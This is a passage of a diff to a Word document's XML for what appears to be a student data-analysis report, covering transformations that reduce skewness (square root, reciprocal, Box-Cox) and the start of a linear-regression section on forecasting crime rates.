+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="446A87AD" id="_x0000_s1033" type="#_x0000_t202" style="position:absolute;margin-left:260.8pt;margin-top:16.9pt;width:200.8pt;height:116.8pt;z-index:251675648;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="both"/>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>After the cube root transformation, the outcome was as follows: The cube root proved to be more effective than the square root in reducing skewness, but it was still not sufficient to fully adjust the highly skewed columns.</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square" anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -11325,7 +12583,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId29"/>
+                    <a:blip r:embed="rId30"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -11351,12 +12609,135 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Applying Square Root and Reciprocal </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Tramsformation</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2E6CBD3D" wp14:editId="127858E5">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>3573780</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>113030</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="2397760" cy="986790"/>
+                <wp:effectExtent l="0" t="0" r="21590" b="22860"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="720821953" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="2397760" cy="986790"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="both"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>The best approach was applying both the Square Root and Reciprocal transformations consecutively.</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="2E6CBD3D" id="_x0000_s1034" type="#_x0000_t202" style="position:absolute;margin-left:281.4pt;margin-top:8.9pt;width:188.8pt;height:77.7pt;z-index:251677696;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="both"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>The best approach was applying both the Square Root and Reciprocal transformations consecutively.</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14B2F3CD" wp14:editId="5B36D2BB">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14B2F3CD" wp14:editId="27AF8D47">
             <wp:extent cx="3287016" cy="1488258"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="258703134" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
@@ -11371,7 +12752,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId30"/>
+                    <a:blip r:embed="rId31"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -11396,48 +12777,426 @@
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
         <w:rPr>
+          <w:b/>
+          <w:bCs/>
           <w:lang w:val="en-IE"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>Left Skewness:</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Now we have </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>olny</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> the columns with negative skew</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ness</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (left skew). For left skew</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ness</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, we have some transformation methods:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+        </w:rPr>
+        <w:t>Square Transformation</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> The square</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> transformation is effective in reducing left skewness. It's the counterpart of the square root transformation and can be used when the data is left-skewed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
         <w:rPr>
           <w:lang w:val="en-IE"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+        </w:rPr>
+        <w:t>Exponential Transformation:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Exponential transformations can be applied to data with negative skewness to stretch the lower values and compress the higher values.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
-        <w:rPr>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-        <w:t>Left Skewness:</w:t>
-      </w:r>
-    </w:p>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+        </w:rPr>
+        <w:t>Box-Cox Transformation:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> The Box-Cox transformation is a family of power transformations that can be used to stabilize variance and make data more normal</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="3146"/>
+        <w:gridCol w:w="3236"/>
+        <w:gridCol w:w="3246"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3209" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Square Transformation result:</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3209" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>Exponential Transformation result:</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3210" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
+              <w:jc w:val="both"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Box-Cox Transformation result:</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3209" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyA"/>
+              <w:pBdr>
+                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+                <w:between w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+                <w:bar w:val="none" w:sz="0" w:color="auto"/>
+              </w:pBdr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F0BECF0" wp14:editId="37523399">
+                  <wp:extent cx="1885307" cy="860612"/>
+                  <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+                  <wp:docPr id="1188298257" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1188298257" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId32"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="1908728" cy="871303"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3209" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyA"/>
+              <w:pBdr>
+                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+                <w:between w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+                <w:bar w:val="none" w:sz="0" w:color="auto"/>
+              </w:pBdr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00B865C2" wp14:editId="6C6D5F2F">
+                  <wp:extent cx="1936561" cy="900953"/>
+                  <wp:effectExtent l="0" t="0" r="6985" b="0"/>
+                  <wp:docPr id="277274128" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="277274128" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId33"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="1951166" cy="907748"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3210" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyA"/>
+              <w:pBdr>
+                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+                <w:between w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+                <w:bar w:val="none" w:sz="0" w:color="auto"/>
+              </w:pBdr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="641E9B5E" wp14:editId="255652EF">
+                  <wp:extent cx="1949645" cy="900430"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="1064909860" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1064909860" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId34"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="1962650" cy="906436"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
-        <w:rPr>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">pplying the Square Transformation, we </w:t>
+      </w:r>
+      <w:r>
+        <w:t>can observe</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> that one column still exhibits skewness. In </w:t>
+      </w:r>
+      <w:r>
+        <w:t>other hand</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, using exponential </w:t>
+      </w:r>
+      <w:r>
+        <w:t>or</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Box-Cox transformations</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, both were </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">effective approaches for mitigating and </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>completely eliminating</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> skewness in the data.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Considering that using Exponential transformation, will change the column to </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>a</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> infinite number, the best approach is using the Box-Cox transformation to handle left skew.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Result of applying exponential transformation:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4850ABC5" wp14:editId="71B788BC">
-            <wp:extent cx="3300773" cy="1420586"/>
-            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
-            <wp:docPr id="1561269254" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52789E67" wp14:editId="6F40C8B9">
+            <wp:extent cx="4637975" cy="1360544"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1531287169" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -11445,11 +13204,78 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1561269254" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPr id="1531287169" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId35"/>
+                    <a:srcRect l="-366" t="1471" r="-1"/>
+                    <a:stretch/>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4664637" cy="1368365"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Result of applying </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Box-Cox</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> transformation:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00773C84" wp14:editId="6FC720DE">
+            <wp:extent cx="4567517" cy="1404187"/>
+            <wp:effectExtent l="0" t="0" r="5080" b="5715"/>
+            <wp:docPr id="795827162" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="795827162" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId31"/>
+                    <a:blip r:embed="rId36"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -11457,7 +13283,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3305862" cy="1422776"/>
+                      <a:ext cx="4577150" cy="1407148"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -11481,266 +13307,86 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Now we have our data cleaned and </w:t>
+      </w:r>
+      <w:r>
+        <w:t>more symmetric</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, we can apply some predictions and Machine learning models.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Forecasting</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">For forecasting the quantity of crimes and the crime rate, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Its</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> necessary to use Machine Learning to predict the number of crime in a given year.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">As we know the features and the target of our data, we will apply </w:t>
+      </w:r>
+      <w:r>
+        <w:t>supervised learning to predict the crime rate:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+        </w:rPr>
+        <w:t>Linear regression:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Linear regression is a simple but powerful model that can be used to predict continuous variables, such as population growth. It works by finding a linear relationship between the population growth and one or more independent variables, such as fertility rates, mortality rates, and migration rates.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
         <w:rPr>
           <w:lang w:val="en-IE"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A99C1D2" wp14:editId="57AD76C5">
-            <wp:extent cx="4029075" cy="1295400"/>
-            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
-            <wp:docPr id="66299470" name="Picture 1" descr="A white rectangular object with black text&#10;&#10;Description automatically generated"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="66299470" name="Picture 1" descr="A white rectangular object with black text&#10;&#10;Description automatically generated"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId32"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
